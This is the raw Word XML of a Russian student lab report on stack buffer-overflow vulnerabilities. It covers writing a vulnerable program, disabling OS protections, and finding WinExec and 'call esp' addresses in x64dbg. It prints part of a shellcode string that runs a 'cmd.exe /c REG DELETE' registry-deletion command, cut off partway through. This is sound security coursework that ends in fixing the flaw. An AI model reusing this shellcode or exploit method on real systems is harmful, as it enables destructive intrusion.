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8CF8" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="006A0481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20E418F6" w:rsidR="00C53ADA" w:rsidRPr="006A0481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235F09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0B136BCD" w:rsidR="00C53ADA" w:rsidRPr="006A0481" w:rsidRDefault="00235F09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6E501156" w:rsidR="00830F2D" w:rsidRDefault="00FB359E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AE79FA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35F09">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC52235" w14:textId="61BE3739" w:rsidR="006251BA" w:rsidRDefault="006251BA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6472FDB" w14:textId="215B3F1B" w:rsidR="00C53ADA" w:rsidRPr="006251BA" w:rsidRDefault="006251BA" w:rsidP="006251BA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«</w:t>
      </w:r>
      <w:r w:rsidR="00235F09">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Изучение программных уязвимостей типа </w:t>
      </w:r>
      <w:r w:rsidR="00235F09" w:rsidRPr="00235F09">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00235F09">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>переполнение буфера</w:t>
      </w:r>
      <w:r w:rsidR="00235F09" w:rsidRPr="00235F09">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A399C" w14:textId="77777777" w:rsidR="00830F2D" w:rsidRPr="006A0481" w:rsidRDefault="00830F2D" w:rsidP="00317985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04F2618D" w:rsidR="00C53ADA" w:rsidRPr="006A0481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27F00">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Основы информационной безопасности»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8770C9E" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00C53ADA" w:rsidP="00317985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27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219CAA1" w14:textId="07CB7CF1" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00961BBB" w:rsidP="0031798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D27F00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Pr="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5131001</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/40003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27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Веденеев А. С.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A04EE08" w14:textId="44839A83" w:rsidR="00D27F00" w:rsidRDefault="00C53ADA" w:rsidP="0031798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27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">       Поляков Д. Т.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8C67C" w14:textId="07D09130" w:rsidR="00D27F00" w:rsidRPr="00B57B60" w:rsidRDefault="00037B6A" w:rsidP="00317985">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1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firstLine="396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</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F5402" w14:textId="69D378E8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9C6C28A" w14:textId="77777777" w:rsidR="000F71FD" w:rsidRDefault="000F71FD" w:rsidP="00317985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17985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09281628" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="009C742E" w:rsidP="0031798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27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Вагисаров В. Б.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3CD90E" w14:textId="675E82DA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37B6A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317985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317985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D27F0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FAB1BA5" w14:textId="77777777" w:rsidR="00235F09" w:rsidRPr="00235F09" w:rsidRDefault="00C53ADA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235F09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Санкт-Петербург</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CF235E" w14:textId="27562A8D" w:rsidR="00C93DCC" w:rsidRPr="00235F09" w:rsidRDefault="00235F09" w:rsidP="0031798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</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00235F09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CA26B" w14:textId="32973B62" w:rsidR="00601F8B" w:rsidRPr="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="00D27F00">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Цель </w:t>
      </w:r>
      <w:r w:rsidR="00037B6A">
        <w:t>и задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BA0A2C" w14:textId="0DF22BD6" w:rsidR="00C93DCC" w:rsidRPr="005467ED" w:rsidRDefault="00037B6A" w:rsidP="00037B6A">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037B6A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00037B6A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C2EF7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">приобретение навыков по прикладному анализу программных уязвимостей типа </w:t>
      </w:r>
      <w:r w:rsidR="009C2EF7" w:rsidRPr="009C2EF7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009C2EF7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>переполнение буфера</w:t>
      </w:r>
      <w:r w:rsidR="009C2EF7" w:rsidRPr="009C2EF7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="009C2EF7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и по предотвращению их эксплуатации. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF45112" w14:textId="6E540395" w:rsidR="00037B6A" w:rsidRDefault="00037B6A" w:rsidP="00037B6A">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="708" w:firstLine="708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>Задачи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A6184" w14:textId="069D1557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Разработать уязвимую к "переполнению буфера" программу, которая принимает в качестве аргумента строку и копирует ее в буфер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53485098" w14:textId="584C226C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Создать шелл-код, который удаляет значение заданного ключа системного реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD16F49" w14:textId="23DB5DBD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 xml:space="preserve">Разработать программу, которая по известному размеру буфера уязвимой программы компонует адрес возврата </w:t>
      </w:r>
      <w:r w:rsidR="00D9740C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00020612">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> шелл-код (с возможностью выбора удаляемого ключа системного реестра) и затем запускает уязвимую программу, программу, передавая в качестве аргумента сгенерированную входную строку, которая вызывает переполнение буфера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00020612">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>и удаление заданного ключа системного реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0B00D5" w14:textId="49DCCE8D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Запустить разработанную программу и убедиться в удалении ключа системного реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECD0EA" w14:textId="5C86BE05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Установить утилиту статического анализа исходных кодов, например, СРPcat, поддерживающий языки С/С++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834BB14" w14:textId="4E89C2EF" w:rsidR="00020612" w:rsidRP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Проверить с помощью утилиты статического анализа исходных кодов программу, разработанную в п. 3. Зафиксировать результаты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00020612">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEF580B" w14:textId="5C695C02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Используя полученный в п. 6 отчет утилиты анализа, устранить ошибки в исходном коде разработанной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037CF913" w14:textId="77777777" w:rsid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Повторить выполнение п. 6 и убедиться в исправлении ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB92CA" w14:textId="1E0D68DF" w:rsidR="00020612" w:rsidRPr="00020612" w:rsidRDefault="00020612" w:rsidP="00317985">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020612">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Запустить модифицированную программу и убедиться в том, что шелл-код не срабатывает и ключ системного реестра не удаляется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F948185" w14:textId="5AB1DAE6" w:rsidR="00AC78CC" w:rsidRDefault="000D6CC6" w:rsidP="00B929E1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74279C44" w14:textId="53D477C7" w:rsidR="007F5ED0" w:rsidRPr="007F5ED0" w:rsidRDefault="007F5ED0" w:rsidP="007F5ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5ED0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Теоретический блок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E8E24" w14:textId="1087D78F" w:rsidR="00E53BF7" w:rsidRDefault="00E53BF7" w:rsidP="00E53BF7">
      <w:r w:rsidRPr="00E53BF7">
        <w:lastRenderedPageBreak/>
        <w:t>Переполнение буфера (buffer overflow) — одна из наиболее распространённых уязвимостей программного обеспечения, возникающих из-за отсутствия контроля границ массивов со стороны компилятора и операционной системы</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466545CA" w14:textId="0D876E07" w:rsidR="00E53BF7" w:rsidRDefault="00E53BF7" w:rsidP="00E53BF7">
      <w:r w:rsidRPr="00E53BF7">
        <w:t>Память процесса сегментирована: код, данные и стек. В стек записываются локальные переменные, аргументы и адрес возврата; в архитектуре Intel стек «растёт вниз», указателем вершины служит регистр ESP, а адрес следующей инструкции хранится в EIP. При вызове функции (CALL) текущий адрес возврата сохраняется в стеке и при RET загружается в EIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F94A935" w14:textId="65DAEAF9" w:rsidR="00E53BF7" w:rsidRDefault="00E53BF7" w:rsidP="00E53BF7">
      <w:r>
        <w:t>При переполнении локального буфера лишние байты могут перезаписать сохранённый адрес возврата. Если на место этого адреса подставлен адрес, указывающий на контролируемые данные или на выбранную инструкцию, управление перейдёт по нему и выполнит произвольный код (шелл-код) или цепочку существующих функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDAD5E" w14:textId="7E81AE33" w:rsidR="007F5ED0" w:rsidRPr="007F5ED0" w:rsidRDefault="007F5ED0" w:rsidP="007F5ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5ED0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Практический блок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5004CEAA" w14:textId="1B3C01E6" w:rsidR="007F5ED0" w:rsidRDefault="00F4751B" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Была разработана уязвимая к «переполнению буфера» программа, получает строку и копирует ее в буфер (</w:t>
      </w:r>
      <w:r w:rsidR="00184DF5">
        <w:t>П</w:t>
      </w:r>
      <w:r>
        <w:t>риложение 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609136C" w14:textId="6B4CF6D9" w:rsidR="00184DF5" w:rsidRPr="00ED0BED" w:rsidRDefault="008D35C2" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для создания шелл-кода, удаляющего значение ключа системного реестра, </w:t>
      </w:r>
      <w:r w:rsidR="00097901">
        <w:t>была отключена</w:t>
      </w:r>
      <w:r w:rsidR="00904017">
        <w:t xml:space="preserve"> защит</w:t>
      </w:r>
      <w:r w:rsidR="00097901">
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00414CE3">
        <w:t xml:space="preserve"> в ОС и </w:t>
      </w:r>
      <w:r w:rsidR="00097901">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00414CE3">
        <w:t xml:space="preserve"> свойствах проекта </w:t>
      </w:r>
      <w:r w:rsidR="00904017">
        <w:t>(рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="00414CE3">
        <w:t>, 2</w:t>
      </w:r>
      <w:r w:rsidR="00AD14A3">
        <w:t>, 3</w:t>
      </w:r>
      <w:r w:rsidR="00904017">
        <w:t xml:space="preserve">). Далее при помощи </w:t>
      </w:r>
      <w:r w:rsidR="00904017" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00904017" w:rsidRPr="00CF3650">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00904017" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbg</w:t>
      </w:r>
      <w:r w:rsidR="00904017" w:rsidRPr="00CF3650">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF3650">
        <w:t>был</w:t>
      </w:r>
      <w:r w:rsidR="00725EA8">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00CF3650">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B3DD0">
        <w:t xml:space="preserve">найдены адреса функций </w:t>
      </w:r>
      <w:r w:rsidR="004B3DD0" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidR="004B3DD0">
        <w:t xml:space="preserve"> для удаления ключа </w:t>
      </w:r>
      <w:r w:rsidR="004B3DD0" w:rsidRPr="004B3DD0">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004B3DD0">
        <w:t>рисунок 4) и</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00725EA8" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="00725EA8" w:rsidRPr="00725EA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00725EA8" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidR="00725EA8" w:rsidRPr="00725EA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A73FB">
        <w:t xml:space="preserve">(рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="009A73FB">
        <w:t xml:space="preserve">) для передачи управления на шелл-код. </w:t>
      </w:r>
      <w:r w:rsidR="002F140F">
        <w:t xml:space="preserve">Был создан ключ </w:t>
      </w:r>
      <w:r w:rsidR="002F140F" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidR="002F140F" w:rsidRPr="00725EA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F140F">
        <w:t xml:space="preserve">в реестре (рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="002F140F">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CE7D30">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00440A64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00097901">
        <w:t>По итогу анализа атакующий шелл-код получил такой вид:</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED">
        <w:t>"aaaabbbb\x99\xf9\x59\x77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90\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>66\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>89\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xe</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>5\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a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01\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>67\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>66\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d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4</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d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1</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a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66\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>51\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>66\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xb</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>8\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>80\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>48\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xa</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>1\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>76\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>66\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xd</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>0\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xc</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>3\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>63\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d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64\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e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65\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>78\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>65\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2</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f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63\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52\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>45\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>47\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44\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
